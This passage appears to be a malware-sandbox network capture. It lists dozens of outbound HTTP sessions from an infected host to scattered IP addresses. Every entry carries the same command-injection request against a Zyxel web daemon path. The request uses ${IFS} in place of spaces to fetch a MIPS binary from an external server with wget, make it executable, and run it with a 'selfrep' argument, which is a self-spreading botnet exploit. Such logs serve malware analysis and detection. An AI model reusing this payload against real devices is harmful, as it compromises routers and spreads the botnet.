                                      Jan 14, 2024 15:50:56.527879953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6913192.168.2.145628670.142.156.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527925968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6914192.168.2.145909645.254.99.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527961969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6915192.168.2.143855063.177.240.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.527987957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6916192.168.2.143495417.219.130.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528032064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6917192.168.2.1451190131.150.134.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528064013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6918192.168.2.144192244.189.21.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528095961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6919192.168.2.145733053.151.73.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528115034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6920192.168.2.1443778146.127.86.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528151989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6921192.168.2.1458406178.193.160.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528192997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6922192.168.2.1460854171.96.30.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528233051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6923192.168.2.1458112151.227.129.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528283119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6924192.168.2.1452080217.92.38.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528328896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6925192.168.2.1456744104.140.197.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528361082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6926192.168.2.1444518142.79.249.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528384924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6927192.168.2.1453284164.213.34.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528433084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6928192.168.2.1444646169.199.116.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528460979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6929192.168.2.144180497.178.7.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528513908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6930192.168.2.1440486176.129.209.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528549910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6931192.168.2.146094875.50.153.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528603077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6932192.168.2.144353643.128.241.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528635979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6933192.168.2.1444424194.44.79.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528677940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6934192.168.2.1443464142.14.1.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528701067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6935192.168.2.1459652128.197.222.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528774977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6936192.168.2.145907463.250.176.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528810978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6937192.168.2.1453258151.70.111.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528836012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6938192.168.2.143428220.84.190.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528851032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6939192.168.2.144881076.106.159.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528892994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6940192.168.2.1435592181.37.169.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528934002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6941192.168.2.1448348220.46.83.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.528992891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6942192.168.2.1442810167.4.108.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529021025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6943192.168.2.1434308199.4.48.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529067039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6944192.168.2.1436958210.55.149.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529094934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6945192.168.2.144781494.102.42.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529160023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6946192.168.2.1446074112.229.39.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529186010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6947192.168.2.145764866.177.88.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529217958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6948192.168.2.144983419.55.207.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529270887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6949192.168.2.145126870.38.22.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529305935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6950192.168.2.1455890111.116.220.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529352903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6951192.168.2.1452650216.159.230.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529386997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6952192.168.2.1459810152.110.142.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529421091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6953192.168.2.1444220150.54.249.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529478073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6954192.168.2.143910444.255.41.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529515982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6955192.168.2.1436222114.198.89.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529553890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6956192.168.2.143476073.211.218.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529586077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6957192.168.2.14346544.221.90.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529639959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6958192.168.2.1445896146.155.42.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529664993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6959192.168.2.144460896.150.234.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529720068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6960192.168.2.1443848122.73.199.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529742956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6961192.168.2.145476044.254.74.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529789925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6962192.168.2.1446506139.112.132.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529819965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6963192.168.2.144760877.86.105.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529850006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6964192.168.2.1445140182.48.135.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529901981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6965192.168.2.144002882.235.198.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529931068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6966192.168.2.14577628.87.64.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529972076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6967192.168.2.1441782104.50.183.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.529972076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6968192.168.2.144267619.58.226.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530018091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6969192.168.2.1433772223.55.158.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530073881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6970192.168.2.1448842108.8.90.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530096054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6971192.168.2.1437402182.56.46.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530148983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6972192.168.2.143803277.44.29.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530183077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6973192.168.2.1432824133.193.218.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530232906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6974192.168.2.143315277.223.24.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.530272961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6975192.168.2.145369288.167.132.94443
                                      TimestampBytes transferredDirectionData
